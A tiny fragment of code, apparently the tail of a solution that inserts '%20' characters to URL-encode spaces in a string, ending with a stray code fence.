string.insert(i,'0')
string.insert(i,'2')
string.insert(i,'%')
return new_len
``` |